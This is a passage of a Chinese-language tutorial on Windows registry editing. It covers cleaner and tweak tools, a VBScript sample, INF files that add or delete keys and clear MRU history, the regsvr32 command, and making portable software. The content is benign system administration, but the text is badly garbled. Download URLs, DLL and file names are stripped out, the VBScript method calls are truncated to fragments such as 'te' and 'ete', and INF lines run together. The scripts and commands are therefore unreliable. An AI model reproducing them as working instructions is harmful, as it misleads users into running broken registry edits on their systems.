的文件夹；3.将鼠标指向“新建”，然后单击需要添加键值的类型。这些类型包括“字符串值”、

“二进制值”和“DWORD”值；4.新添加的键值以一个临时键值显示，为新添加的键值输入一个

新的值，然后回车即可。

第二种途径：软件修改(安全)。利用各种工具软件，完成对注册表的编辑工作通过一些

专门的修改工具来修改注册表，比如：MagicSet、TweakUI、WinHacker等等。其实控制面板

就是一个这样的工具，只不过功能简单一些。下面对几个常用注册表修改软件作简要介绍(以

下介绍的软件均可到：

1.超级兔子魔法设置 Magic Set。 是个与Tweak UI类似的系统设置软件，所具备的功

能比Tweak UI和国内同类软件还要多，而且是全中文的，特别为中国用户设计的功能有：调

整输入法的顺序、修改当前系统的语言、修改开始菜单的“程序”“文档”等，Magic Set 是真

正全面的系统设置软件，修改Win98易如反掌。从Magic Set V2.98 起，无须注册，即可使

用所有功能，配合大众软件新文章的设置，让你的Win98 真正如虎添翼！

①真正支持OE5；②能够在修改系统文件夹的路径时（比如：收藏夹位置），拷贝或移动

文件到新的目录；③完全配合大众软件2000年第2、3期文章：“Windows 98终极指南”，加入

所有新的设置：优化MapCache、优化的硬盘后台缓冲加速Vcache、恢复关闭系统时的“睡眠

模式”选项；④清除所有硬盘的*.bak、*.tmp 等垃圾文件；⑤更高级的鼠标右键菜单修改；

⑥密码探测器；⑦公开只有注册用户才能使用的：高级隐藏功能，能够隐藏开始菜单的程序、

收藏夹等项目；⑧以一变三的输入法，将一个输入法变成三个。

⑨软件已经可以在Win2000 下使用。下载网址：

/download1/2.再生良药/Relive V1.03 184KB。在

Windows95/98的日常操作中，有非常多的软件都会在注册表中写入相关信息，如：窗口的位

置、注册码、软件设置、文件关联、日期限制等，即使卸载这些软件，也会留下一些垃圾，

以至注册表越来越大，系统越来越慢。

绝大部分软件在安装时会向系统的SYSTEM目录中COPY一些DLL文件，在Windows目录中生

成INI文件，即使是卸载它们也不一定能删除干净，理论上将它们不会影响Windows的速度，

但却占据了无谓的硬盘空间，让人不爽。只要我们将注册表中信息和这些垃圾文件删除，

Windows便可以焕然一新。现在有很多小工具可以从注册表中删除无用的键，但没有任何程

序保证其中的删除操作是绝对安全的，真正绝对安全的办法就是恢复注册表，这个问题很好

解决，但如何判断那些文件是多余的文件，是可以删除的呢？Relive便是针对这个问题而编

写的小程序，Relive本身不会在Windows中删除任何文件。主要通过备份和恢复注册表和

、来实现。下载网址：

/download1/3.超级兔子注册表优化RegOpt V3.1

简体版 453KB能够查找Windows 98的注册表中的垃圾，并给予清除，功能上超越微软的

RegClean 4.1a，而且修正了RegClean的Bug。最新的版本能够清除更多的注册表垃圾，让你

的系统真正干净。能够扫描的错误与垃圾包括：错误的类，错误的菜单排序，错误的反安装

程序，不存在的文件，错误的Dll和Vxd文件。下载网址：

/download1/4.超级兔子注册表扫描 V3.3 简体版

456KB超级兔仔注册表优化软件能够查找Windows 98的注册表中的垃圾，并给予清除，功能

上超越微软的RegClean 4.1a，而且修正了RegClean的Bug。最新的版本能够清除更多的注册

表垃圾，让你的系统真正干净。能够扫描的错误与垃圾包括：错误的类，错误的菜单排序，

错误的反安装程序，不存在的文件，错误的Dll和Vxd文件。新版本增加了系统优化功能，配

备三种语言的操作界面，除了适合Win95/97/98使用外，V2.9 版还能在最新的Win2000 下使

用，，绝对让你的系统真正优化。下载网址：

/download1/5.注册终结者 V2.7 完全版 953KB本软

件属于一个注册表修改软件!使用本软件可轻松地修改Windows 98系统设置，让你进一步地

控制操作系统，扩展Windows的功能，方便自己的日常应用操作及管理。(使您轻松成为修改

注册表的高手)作者:主要针对目前较流行的Windows 98 第二版编程,对第一版同样适用!下

载网址：/download2/6.米老鼠注册表减肥 V1.6

215KB快速清除注册表垃圾，清除前自动备份。可删除不使用的时区、区域、键盘布局、登

录的软件、Windows外观方案。下载网址：

/download2/7.神奇注册表 562KB本软件是一个

注册表修改软件!使用本软件可轻松地修改Windows98系统设置，使您立刻成为注册表专家！

本软件使用Microsoft Visual C++编制，整个软件只需要一个可执行文件就可运行，真正的

“绿色”软件。下载网址：/download2/8.注册表吸尘器

V0.60 136KB“注册表吸尘器”并不能帮你把注册表缩小许多，但它能帮你解决许多实际问题。

它能帮你把注册表中的垃圾“吸”出来，以使你的软件正常工作。有些软件可能需要重新安装，

但有时注册表中的垃圾不除，即使重新安装也不能解决问题。希望你喜欢本软件。能帮你找

出并清除错误的文件类型、错误的类型库（TypeLib）、注册错误的控件、错误的程序标识

（ProgID）等。你可以自由选择是否删除每个错误的项目，并可察看出错原因。下载网址：

/download2/p V2.8 Build 632 114KB

它可以详细地向你报告注册表及其他与系统有关项目的修改变化情况。RegSnap 对系统的比

较报告非常具体，对注册表可报告修改了哪些键，修改前、后的值各是多少；增加和删除了

哪些键以及这些键的值。报告结果既可以以纯文本的方式，也可以 html 网页的方式显示，

非常便于查看。除系统注册表以外，RegSnap 还可以报告系统的其他情况：Windows 的系统

目录和系统的 system 子目录下文件的变化情况，包括删除、替换、增加了哪些文件；Windows

的系统配置文件 和 的变化情况，包括删除、修改和增加了哪些内容；

自动批处理文件 是否被修改过。该软件可以在需要的时候方便地恢复注册表，

可以直接调用 regedit 程序查看或修改注册表，还可以查看当前机器的机器名和用户名。

下载网址：

izer 2000 V5.7 567KBCustomizer 2000可以让你通过一个安全的图形化界面

里来调整注册表信息。这个软件让你可以浏览和改变许多Windows98中的秘密设置，并且每

一个可以修改的设置都会有一些简单的说明。 下载网址：

/download2/eg V3.3.3 1442KBCleanReg3帮

您将系统中无用的文件全部一扫而空。CleanReg3与一般系统登录文件修改工具软件不同的

是，它并非真正立即将这些登录设定给移除掉，而是先将您的系统中目前有那些文件连结有

错误的先显示出来，然后您可以再选择是要透过手动的方式选择是要忽略掉这些无用的文件

或者是要移除掉。下载网址：

/download2/ean V4.0.0.5 990KB是一个

辅助使用者整理registry的工具软件。必须要对registry有一定的了解，才有办法判断应该

怎麽使用他来清除Registry当中的垃圾。是一个设计给专家使用的工具。下载网址：

/download2/y V2.0(正式版) 94.1KB功能:

方便您更改注册表,即使您一点也不懂注册表的更改!您只要选择自己需要更改的项目,再点

击更改即可。2.0版新增许多功能，并完善了其它的各项功能。经过作者的不懈努力终于有

正式版出台了！本软件是免费软件!下载网址：

/download1/ V4.32 Win95/98 66KB 下载

网址：/download2/mon V4.32 Win NT/2000 66KB

下载网址：/download2/">

Regmon (Registry Monitor) 是一个出色的注册表数据库监视软件，它将与注册表数据

库相关的一切操作(如读取、修改、出错信息等)全部记录下来以供用户参考，并允许用户对

记录的信息进行保存、过滤、查找等处理，这就为用户对系统的维护提供了极大的便利。

Perfect Companion V3.7.04 1677KBPerfect Companion 包括两个工具：SnapShot

可以在你安装软件前为系统文件进行扫描和快照，当软件安装结束后，它会向你报告哪些文

件改变了、那些文件被旧版本文件覆盖掉了、或是向系统中增加/删除了哪些文件。而

Registry Cleaner，可以将那些注册表中无用的垃圾清除掉。它可以扫描所有的 Class

IDkeys，然后再对系统文件进行扫描来找出那些无用的信息。为了安全起见，软件还提供了

Undo 功能。必需先有 VB5 Runtime。下载网址：

/download2/t Companion V3.7.04

Win9x/Me 1679KB 下载网址： /download2/fect

Companion V3.7.04 WinNT/2000 1677KB 下载网址：

/download2/包括两个工具：SnapShot可以在你安装

软件前为系统文件进行扫描和快照，当软件安装结束后，它会向你报告哪些文件改变了、那

些文件被旧版本文件覆盖掉了、或是向系统中增加/删除了哪些文件。 而Registry Cleaner，

可以将那些注册表中无用的垃圾清除掉。它可以扫描所有的Class IDkeys，然后再对系统文

件进行扫描来找出那些无用的信息。为了安全起见，软件还提供了Undo功能。

ry Cleaner V2.0.1.5 711KB清除 Windows 注册表多余记录的工具。下载网

址：/download1/ry Compare V1.30 664KB

每新安装一套程序在电脑中，你知道它对系统注册表做了哪些改变吗？利用Registry

Compare在安装程序前做个系统注册表快照，再于安装该程序后，回到Registry Compare，

再做一次快照，Registry Compare就会将前后系统注注册表的差异明细列出供你参考。下载

网址：/download2/ry Tools V2.01 832KB

大多数Windows使用者应该都知道Windows注册表是相当重要的。通常安装件或反安装软件都

会更改到注册表，有经验的使用者大都会事先将注册表备份起来，待无法进入Windows时即

可用来恢复。虽然备份Windows注册表有很多方式和工具可作到，不过，RegistryTools仍有

它独到的特色。RegistryTools以容易使用的图示操作界面，包含了三个主要功能，有：备

份注册表(BackupRegistry)、恢复注册表(RestoreRegistry)、制作紧急修复磁片

(MakeFIX-ITDisk!)等功能，只需在RegistryTools图示操作界面使用滑鼠轻按一下即可备份、

恢复注册表或制作紧急修复磁片。下载网址：

/download2/ry Optimizer V4.0

52KBWindows因安装软件或硬件都会更改系统配置文件( 及 )长久下来

因安装及移除导至Windows系统配置文件也变的越来越大及凌乱,也会影响系统正常运作,这

也就是Windows在使用过一阵子後便会出现当机的主因之一,Registry Optimizer可以最佳

化Windows系统配置文件,经过一段时间的优化,可将系统配置档 ( 及 )

减肥,但并不影响系统正常运作,并且能让硬盘多些空间及让系统跑的更顺畅。下载网址：

/download1/第三种途径：编程虽然微软公司提供一个注

册表编辑器程序，用于更改系统注册表中的设置，但是如果你对注册表没有完全弄懂，就有

可能酿成大祸——严重的可能造成系统瘫痪；尽管我们还有以上介绍的那么的工具软件可以

帮助我们处理注册表，但可能仍然满足不了我们某些关于注册表的特殊要求。比如，当我们

编制了一个应用程序时，如何将应用程序的设置信息及相关数据在安装程序时写入注册表中

呢？

在这种情况下，这就需要我们理解如何通过程序来操作注册表并且写入或删除相关的信

息。编程人员希望能在应用程序中对其加以控制，于是就产生了第三种方法：自己编写程序。

只要您认真阅读了本专题以上所有内容，只要您对编写程序感兴趣，就应该继续看下去。

它将教会您如何随心所欲地完成所有与注册表有关的问题。

许多商品化的软件或专业化的软件在您的机器上首次安装的时候都会通过改写注册表

来完成软件的正确安装运行，梦想成为编程高手的你当然需要掌握读写注册表这一技术。利

用好注册表会为您的应用程序增色不少。

关于注册表的知识相信您通过前面专题的介绍已经有了较深入的了解。系统有六个预定

义好的关键字(根键)，这六个关键字是用户或系统访问注册表的入口点。我们常用到的只有

前四个关键字。而在编程时我们一般用到只是HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE这

两个关键字，因为与应用程序相关的数据存在于这两个关键字下。

后面将为你详细介绍如何通过程序来操作注册表。请看“编程所需的有关准备知识”和

“编程解决注册表问题实例”部分。

（四）用脚本文件简单修改注册表

用.VBS脚本，也就是SCRIPT 脚本文件对注册表进行修改。如果您的爱机不支持VBSCRIPT，

那么请您直接阅读第二部分。下面我通过一个例子自来解释脚本文件： Windows Script Host

Sample ScriptYou have a royalty-free right to use, modify, reproduce and

distributethe Sample Application Files (and/or any modified version) in any wayyou

find useful, provided that you agree that Microsoft has no warranty,obligations or

liability for any Sample Application Files.

------------------------------------------------------------------------This

sample demonstrates how to write/delete entries in the registry.

L_Welcome_MsgBox_Message_Text = "此脚本显示如何创建和删除注册表项。

"L_Welcome_MsgBox_Title_Text = "Windows Scripting Host 范例"Call

Welcome()**********************************************************************

************ Registry related methods.

*Dim WSHShellSet WSHShell =

Object("") "创建项 HKCUMyRegKey 数值

为 Top level key"te "HKCUMyRegKey", "Top level key"

"创建项 HKCUMyRegKeyEntry 数值为 Second level key"te

"HKCUMyRegKeyEntry", "Second level key" "将数值项

HKCUMyRegKeyValue 设为 REG_SZ 1"te "HKCUMyRegKeyValue",

"将数值项 HKCUMyRegKeyEntry 设为 REG_DWORD 2"te

"HKCUMyRegKeyEntry", 2, "REG_DWORD" "将数值项

HKCUMyRegKeyEntryValue1 设为 REG_BINARY 3"te

"HKCUMyRegKeyEntryValue1", 3, "REG_BINARY" ot;删除

HKCUMyRegKeyEntryValue1 数值"ete

"HKCUMyRegKeyEntryValue1" "删除 HKCUMyRegKeyEntry 项

"ete "HKCUMyRegKeyEntry" "删除 HKCUMyRegKey 项

"ete

"HKCUMyRegKey"***************************************************************

******************* Welcome*Sub Welcome()Dim intDoItintDoIt =

MsgBox(L_Welcome_MsgBox_Message_Text, _vbOKCancel + vbInformation,

_L_Welcome_MsgBox_Title_Text )If intDoIt = vbCancel d IfEnd Sub1.

在上例中,单引号后面是注释.

2. L_Welcome_MsgBox_Message_Text = "此脚本显示如何创建和删除注册表项。

"L_Welcome_MsgBox_Title_Text = "Windows Scripting Host 范例"这两句是提示.

3. 用 Set WSHShell = Object(""),定义一个对象

WSHSHELL 为,E()是一个确认对话框.

5. "创建项 HKCUMyRegKey 数值为 Top level key" 是声明要修改的

注册表项.

te "HKCUMyRegKey", "Top level key" 在HKCU下面创建MYREGKEY

子键,读者也可以根据自己实际情况修改键名、指定路径。

6、REG_SZ为字符串,要用引号引起来,REG_DWORD 为0—2147483647之间整

数,REG_BINARY与之范围相同。

7、需要注意的是，若结尾是“”则创建一个主键（项），将其默认值设为逗号后面的值

项，若结尾不是“”，则在前一个“”后面的项中建立所设立的VALUE，逗号后面为其值。

8、ete与te大致相同，只是功能相反。

各位可以将上面文档复制，存为，然后双击即可。

用INF 脚本修改注册表。同样我先举一个例子，然后做详细讲解。

[VERSION]

SIGNATURE=$CHICAGO$[DEFAULTINSTALL]

ADDREG=REG=[]

HKLM,SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONWINLOGON,AUTOADMINLOGON,0,”0”

HKCU,CONTROL PANELDESKTOP,SMOOTHSCROLL,1,01,00,00,00HKCU,CONTROL

PANELDESKTOP,SCREENSAVEUSEPASSWORD,1,00,00,00,00[]

HKCU,MYKEYHKLM,SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONWINLOGON,DEFAULTUSERNA

MEHKLM,SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONWINLOGON,DEFAULTUSERNAME1.[VER

SION] 是文件头。

SIGNATURE=$CHICAGO$ 是指针对WINDOWS（CHICAGO是WINDOWS95的内部名称）要编辑注

册表必须以这两句开头。

2、[DEFAULTINSTALL]段指出INF文件包含的其他段，ADDREG 和DELREG是键，有特殊意

义，他指出要添加或删除的注册表项段名3、WINDOWS98总是先处理DELREG段，后处理ADDREG

段，这可能会对我们的应用有所帮助。

[]

HKCU，MYKEY，MYVALUE，0，“STRING” 添加名为MYVALUE的字符串值项到键MYKEY下，其

值设为STRINGHKCU，MYKEY，MYVALUE，，STRING 添加名为MYVALUE的字符串值项到MYKEY，将

其值设为STRINGHKCU，MYKEY，MYVALUE，1，77，34，05，20添加名为MYVALUE的二进制值项

到键MYKEY下，其值设为二进制值77，34，05，20HKCU,MYKEY,0,”DEFAULT VALUE” 设置键MYKEY

的缺省值项为字符串DEFAULT VALUEHKCU,MYKEY,,”DEFAULT VALUE” 设置键MYKEY的缺省值项

并将其值设为字符串DEFAULT VALUEHKCU,MYKEY 添加注册表键MYKEY但不设置其值

[]

HKCU,MYKEY,MYVALUE 从键MYKEY 中删除值项MYVALUEHKCU,MYKEY 删除键MYKEY及其全

部子键,即删除全部分支.

下面是一个自动清除MRU记录的INF文件:

[VERSION]

SIGNATURE=$CHICAGO$[DEFAULTINSTALL]

DELREG=DELTEGKEY[DELREGKEY]

HKCU,”SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONEXPLORERDOC FIND SPEC

MRU”,HKCU,

SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONEXPLORERFINDCOMPUTERMRU,HKCU,

SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONEXPLORERRECENTDOCS,HKCU,

SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONEXPLORERRUNMRU清除MRU和

WINDOWSRENCENT 的批处理文件@ECHO OFFC:

,INSTALLHINFSECTION DEFAULTINSTALL 132 OY |ERASE

C:WINDOWSRECENT各位可将 加入

HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN中让电脑自动在

启动时完成任务.

（五）监视注册表的一举一动

注册表是Windows操作系统中的一个核心数据库，其中保存了很多系统运行中的配置文

件，而很多的应用程序也需要向其中写入数据才能正常运行。如果初学的朋友想知道那些优

化软件到底修改了注册表中什么地方？或者想知道应用程序到底向注册表中写入了什么数

据吗？这时，可以借助注册表的“监视器”：RegSnap，让你快速成为一名了解注册表的达人。

一、建立初始快照安装RegSnap，直接运行其主程序即可（如图1），笔者推荐用绿色软

件联盟的RegSnap绿色版本，不需要安装，下面就以修改是否显示扩展名为例，来看看如何

使用RegSnap。图1 RegSnap的主界面

系统默认是隐藏文件扩展名的，如果要显示隐藏的文件扩展名，需要到“文件夹选项”

中去设置，现在就来看看这样设置以后，系统到底修改注册表中什么地方来切换扩展名的显

示模式。在上图的启动向导中点击“新建快照”按钮，在弹出的“保存快照”界面中选中“仅生

成注册表的快照”，继续点击“确定”按钮即可开始建立快照。

二、建立修改快照现在打开任意文件夹，依次点击“工具／文件夹选项／查看”，将扩展

名状态设置为显示状态，确定以后回到Regsnap软件界面，点击工具栏中的“照相机”图标再

次建立仅生成注册表的快照（如图2）。

图2 用RegSanp生成清册表快照提示：强烈建议在创建修改快照前不要进行与目标内容

无关的操作，这样可以减少比较结果中的无关内容。

三、比较快照点击“文件／比较（或按F3键）”打开“比较快照”窗口，在“报告选项”中选

择“显示被修改的主键名称及键值”并勾选“生成REG”文件，点击“确定”按钮即可进行比较了

（如图3），同时在Regsnag还可以输出一个记录比较结果的htm文件（如图4）。

图3 快照的比较功能图4 生成的比较结果四、创建注册表文件经过查阅报告，发现是否

显示扩展名其实就是对“HideFileExt”的键值进行0和1之间的切换而已！只要建立不同键值

的注册表文件，当需要哪一种显示状态是双击后导入哪个就行了。进入Regsnag的安装目录，

会发现两个具有很长文件名的注册表文件，现在用记事本程序打开它们，将无关的数据清理

掉，然后重新命名为容易识别的文件名即可（如图5）。

图5 用RegSnap比较出的结果写在最后虽然Regsnag的操作非常简单，但功能却一点也不

弱，上面介绍的只是它的最基本功能和操作，其实Regsnag除了监视注册表以外，还可以监

视Windows 的系统配置文件 和 的变化情况，以及自动批处理文件

是否被修改过等。所需要做的，只是在操作前后分别建立快照，然后再进行

比较即可。怎么样，现在你就可以试着利用该软件看看调整系统设置时，注册表都发生了那

些变化。

（六）学习强大的Regsvr32命令

Regsvr32是Windows系统的内嵌命令，通过它可以注册或取消注册对象链接和嵌入控件

（OLE），比如最常见的动态链接库文件（DLL）及网页制作和浏览时必须用到的 ActiveX 控

件文件（OCX）。但由于缺乏相关的学习资料，许多朋友都误解Regsvr32只是一个安装和卸载

DLL动态链接库的命令，更谈不上正确使用它了。所以，应广大读者的点播，本期特刊登此

文，以期达到帮助读者快速掌握并熟练使用Regsvr32命令的目的。

Regsvr32命令，在许多杂志媒体以及网络教学站点中出现的频率极高，可是许多朋友对

它的了解却很浅显。其实，Regsvr32命令拥有强大的本领。例如，当我们的Windows系统或

IE浏览器出现故障的时候，通过使用Regsvr32命令来注册文件就可轻松解决问题。现在，就

让我们开始Regsvr32命令的学习之旅吧！

一、准备篇 Regsvr32命令哪里寻不同的Windows系统， 命令的位置也不

同。正常状态下， Windows 2000/XP系统中，该命令位于C:WINNTsystem32下；如果是Windows

9x系统，该命令则位于C:WINNTsystem下。

二、基础篇 Regsvr32命令的使用方法命令的讲解往往枯燥难懂，所以本篇借助实例来

辅助说明。例如，我们要注册C:kk文件夹下一个名为的动态链接库，可以在"开始→

运行”中键入"CMD”命令，在打开的DOS窗口中键入"Regsvr32 C:”并回车。此时，

系统会自动加载且开始尝试调用该动态链接库的DLLSelfRegister函数，成功调用后

会显示相应的提示框。如果要卸载动态链接库，则键入"Regsvr32 /u C:”

即可.

上述只是Regsvr32命令的基本用法，从中可见该命令的格式为：Regsvr32 [/s] [/n]

[/i[:cmdline]] dllname。它包括下面4个参数。

/u：卸载安装的控件或卸载服务器的注册；/s：注册成功后不显示操作成功信息框；/i：

调用DllInstall函数并把可选参数[cmdline]传给它，当使用/u时用来卸载DLL；/n：不调用

DllRegisterServer，该参数必须和/i一起使用。

小提示：执行Regsvr32命令还需要系统的、和这3

个文件才能正常运行。

三、提高篇 错误提示及解决如果Regsvr32命令加载不成功，系统会给予相应提示，它

们的含义是什么且如何解决呢?

（1）提示" is not an executable file and no registration helper is

registered for this file type.”：如果键入文件的后缀名不是EXE、DLL或OCX，就会出现

以上提示。

（2）提示"LoadLibrary("c:") failed”：系统找不到指定的。我们需

要指定路径，例如键入Regsvr32 d:。

（3）提示"OleInitialize failed (or OleUninitialize failed)”： COM库的初始化

失败。如果Regsvr32命令在加载的时候COM库初始化失败，则命令执行失败。

（4）提示"No DLL name specified”：键入的命令未包括DLL文件名。解决办法是键入

完整的DLL文件名即可。

如果在使用Regsvr32命令时出现以上提示，可以先试着纠正键入的错误，如错误的DLL

路径或名称。还不能解决问题时，则需重启计算机。如果DLL等格式的文件已经损坏，则需

要重新提取。

四、高级篇 Regsvr32命令案例实战当我们打开一个站点，点击超链接没有反应，按

Shift+鼠标左键也不能新开页面进行浏览，这时就需要使用Regsvr32命令来排除故障。先在

"开始→运行”中键入"CMD”命令，启动DOS窗口并键入"Regsvr32 ”。系统会弹

出提示框，单击"确定”后再键入"regsvr32 ”，注册这2个动态链接库后重启计

算机，这样IE浏览器即可恢复正常

（七）使用详解

使用详解是32位系统下使用的DLL注册和反注册工具，使用

它必须通过命令行的方式使用，格式是：

regsvr32 [/s] [/n] [/i[:cmdline]] DLL文件名命令可以在“开始→运行”的文本框中，

也可以事先在bat批处理文档中编写好命令。未带任何参数是注册DLL文件功能，其它参数对

应功能如下：

/u：反注册DLL文件；/s：安静模式（Silent）执行命令，即在成功注册/反注册DLL文

件前提下不显示结果提示框。

/c：控制端口；/i：在使用/u反注册时调用DllInstall；/n：不调用DllRegisterServer，

必须与/i连用。

单独运行程序，可以看到弹出一“No DLL name specified”的错误提示框，

并且可以看到参数原英文提示信息。

弹出一“No DLL name specified”的错误提示框输入DLL文件名时，如果待处理的是非系

统文件，必须在文件名前添加文件绝对路径，必须注意的是文件路径不包含中文，否则很可

能导致处理失败。如果碰到regsvr32不能正常执行时，很可能系统文件遭到破坏，因为使用

时会调用到 、和三个文件，在DOS模式或

其它系统替换正常文件即可解决。

一、屏蔽对压缩文件的支持早在Windows千禧版（Me）时，微软就在系统内置了对ZIP

文件的支持，不过微软似乎并不关心其功能，以至于在Windows Server 2003的ZIP功能也仅

仅停留在把ZIP文件当成文件夹浏览、压缩等支持。主流压缩软件WinRAR已经遍布天下，

Windows自带的ZIP浏览自然有理由丢之门外。

点击“开始→运行”，在运行输入框中输入“regsvr32 /u ”(不包括引号，下

同)，回车即可。同样，如果不喜欢系统查看CAB压缩包，输入“regsvr32 /u ”

来取消对的注册。

系统内置了对ZIP文件的支持二、屏蔽视频预览和刻录功能每当用资源管理器选中一个

视频文件时，XP会在左侧面板预览显示，不过这对于较大的视频文件时，往往要读上半天。

用户在大多数情况下并不需要预览，禁止的方法也非常简单，在运行输入框中输入“regsvr32

/u ”即可撤消视频预览。

选中一个视频文件时，XP会在左侧面板预览显示三、屏蔽Windows图片和传真查看器默

认情况下，Windows XP默认的图片查看工具是“Windows图片和传真查看器”，虽然通过安装

ACDSee等其它看图软件可以绕开图片查看器，但未真正“消灭”此工具。在运行输入框中输入

“regsvr32 /u ”，回车即可弃图片查看器于系统外。

安装ACDSee等其它看图软件可以绕开图片查看器但未真正“消灭”此工具四、拯救失落的

“搜索”

不知是与软件的冲突还是优化错误，最近一些朋友的Windows XP的搜索界面空白无物，

昔日的搜索助手已“不见踪影”，右窗口仍然有文件列表框，使用其它系统功能正常。何故？

可以肯定，系统的搜索功能文件出错，后来知道是此链接库注册不正常，解

决方法也相当简单：在运行输入框中输入“regsvr32 ”，回车后，重新运行搜索

窗口，即可恢复。

系统的搜索功能文件出错Windows Server 2003也有类似问题五、纠正IE保存mht网页错

误点击Internet Explorer“文件→另存为”命令菜单，在“保存类型”中选择“Web电子邮件档

案(.mht)”格式后保存文件错误。

在“保存类型”中选择“Web电子邮件档案(.mht)”格式后保存文件错误在运行输入框中输

入“regsvr32 ”，回车即可解决。

如果在使用 OE时提示“无法启动Outlook Express。应用程序无法创建字体缓存对象。

计算机内容不足或磁盘已满。请与Microsoft支持部门联系以获取更多的帮助。 (0x8007000E，

14000)”，点击“确定”后又弹出“无法初始化，Outlook Express无法启动。Outlook

Express可能没有正确安装。”的提示框，从提示的信息似乎是系统磁盘空间满，其实这也是

“”没有正确链接导致，通过同样方法解决。

使用 OE时提示无法启动Outlook Express。

六、在使用Windows Update更新操作时，提示“IEXPLORE错误”，无法继续更新操作。

首先在运行输入框中输入“regsvr32 /u ”反注册此链接库，接着进入

“X:Program FilesWindows Update”（X为Windows XP的在盘符），删除文件。

最后重新执行Windows Update操作，系统会重新生成文件，错误提示也不会再弹

出。

（八）巧用INF文件修改注册表

INF是一个用于安装驱动程序的文件，是文本格式的。里面记录着驱动程序的所有相关

资料，随便打开一个INF文件度可看到很多奇奇怪怪的东西，其实这一点也不奇怪，因为每

一项都有特定的含义，比如从VERSION一项就可以看出支持的Windows版本是什么。比如Win9X

系列的代号就是CHICAGO，Win2000/XP的代号就是Windows NT，知道这些就好办了。

首先打开记事本，然后在里面输入下面内容（最好复制、粘贴），然后保存为。

[Version]

SIGNATURE = "$CHICAGO";如果是Windows2000/XP，请将CHICAGO修改为Windows

NT[DEFAULTINSTALL]

ADDREG = []

HKLM,"SOFTWARESmallfrogs",,%REG_SZ%,Smalfrogs向你表示祝贺!

HKLM,"SOFTWARESmallfrogs",SZ字符串,%REG_SZ%,Congratulations!

HKLM,"SOFTWARESmallfrogs",Dword双字

节,%REG_Dword%,1HKLM,"SOFTWARESmallfrogs",Binary二进

值,%REG_BINARY%,00,00,00,00,10,11,00,00HKLM,"SOFTWARESmallfrogs测试"[Strings]

REG_SZ = 0x00000000REG_BINARY = 0x00000001REG_DWORD = 0x00010001鼠标右键点击

这个INF文件，选择快捷菜单的安装命令，如果你格式没有错误的话,应该在

HKEY_LOCAL_MACHINESoftware下面看到一个新的主键：Smallfrogs，选中这个主键，，应该

可以在右边看到默认值为Smalfrogs向你表示祝贺!，还有1个叫做"SZ字符串"的字符串值为

Congratulations!等等。另外展开这个主键，还可以看到另外一个主键，名字叫做"测试",

是不是感到很奇怪啊？其实一点都不神秘，就是那个INF文件搞得鬼。下面我来详细的解释

一下。

其实这是调用了INF文件最基本的功能：修改注册表。格式如下：

[Version] 指明能够使用的Windows版本Signuture 系统从这里来看是不是适合当前版

本，如果适合的话就执行，否则不执行[DEFAULTINSTALL] 表示默认安装值ADDREG 表示在注

册表中添加东西DELREG 表示在注册表中删除东西[Strings] 是扩充用的，这样就可以避免

记忆麻烦的数字了。比如字符串本来应该是0，现在用REG_SZ表示。

基本原理就这些，现在我们来删除刚刚我建立的东西。

在记事本里面粘贴下面内容[Version]

Signature = "$CHICAGO$"[DEFAULTINSTALL]

DELREG =[]

HKLM,"SOFTWARESmallfrogs测试"HKLM,"SOFTWARESmallfrogs"然后保存为

，还是鼠标右键点击这个INF文件，选择快捷菜单的安装命令，然后你再到注册

表编辑器里面看看，是不是我刚刚建立的东西没有了。怎么样？很神气吧？

也许有人会问，能不能只删除一项呢？可以的。比如我删除

HKEY_LOCAL_MACHINESmallfrogs下的那个叫做"SZ字符串"的字符串值，那么只需要写下面

内容：

[Version]

Signature = "$CHICAGO$"[DEFAULTINSTALL]

DELREG =[]

HKLM,"SOFTWARESmallfrogs",SZ字符串然后按照同样的方法运作即可只删除这个字符

串值。

注意：这个方法危险度很高，而且格式要求也很严（必须使用英文标点符号，而且段落

之间必须空一行。请按照我的格式书写），请大家小心使用。

（九）扩展使用.INF文件－制作免安装的绿色软件

绿色软件的制作中,可以把注册表文件和提取出的软件打包在一起做成绿色软件。但

是.REG文件中的路径都是静态的，一旦写好，就不会随着系统的变化而变化，而在.INF文件

中，可以使用变量操纵路径，从而可以跟踪安装程序所需要的路径的变化。下面首先以一个

完整的例子来演示如何用.INF文件制作绿色软件，然后具体讲解.INF文件的各种用途。

EmEditor的绿化下载EmEditor的安装文件后，发现用WinRAR可以打开，

解压后，运行EmEditor，发现丢失了预定义的多种文本格式的语法配置，看来这样做不行，

只好采用系统快照的方法了。请随我一步步进行，步骤如下：

1 扫描系统，制订系统快照。这里我仅仅记录当前系统的注册表（因为我认为EmEditor

不会向系统目录拷贝文件，如果判断错误，就会导致“绿化”失败），运行ART（Advanced

Registery Tracer），扫描一遍注册表。如图EmEditor_，不要关闭ART。

2 安装EmEditor。随便安装到哪里，反正一会就卸载。安装好后，如果需要的话，更改

配置，或者配置新的文件类型，例如我就增加了NFO文件类型，设定和NFO文件相关联的字符

集，这样可以用EmEditor直接察看NFO文件，不需要专门的察看工具了。

3 记录系统变化。再一次扫描系统，给系统作快照，从ART里面再一次扫描注册表，然

后选择菜单命令Registry-〉compare here或者直接用键盘F10，比较结果如图

EmEditor_，点击图中那个save to redo file的按钮，存储为文

件，关闭ART。

4 复制并卸载。复制安装好的EmEditor目录到其他路径，然后卸载EmEditor程序。

5 分析。打开刚刚导出的文件，这是一个巨大的reg文件，单单是REG文件

就有1兆多，不过不用担心。阅读注册表后，删除和EmEditor无关的注册表项后，如仅仅和

资源管理器相关的注册表部分，发现剩下的注册表文件可以分成3个部分。一部分在位于注

册表的这个路径[HKEY_LOCAL_MACHINESOFTWAREEmSoft]，里面大部分不涉及路径，只有一

项记录了EmEditor的路径，就是"ModulePath"="h:EmEditor4"；还有一大部分在注册表

的这个路径下面[HKEY_CURRENT_USERSoftwareEmSoftEmEditor v3]，里面有很多项都涉

及了EmEditor的路径，如"Tmpl"="h:"；还有就是和EmEditor

和txt文件后缀向关联的注册表设置，把EmEditor设置为IE中缺省的源代码察看工具的注册

表设置以及注册COM组件的注册表部分（和InProcServer32相关的就是）。

6 “绿化”。

6.1 把位于注册表路径路径[HKEY_LOCAL_MACHINESOFTWAREEmSoft]的内容存储到

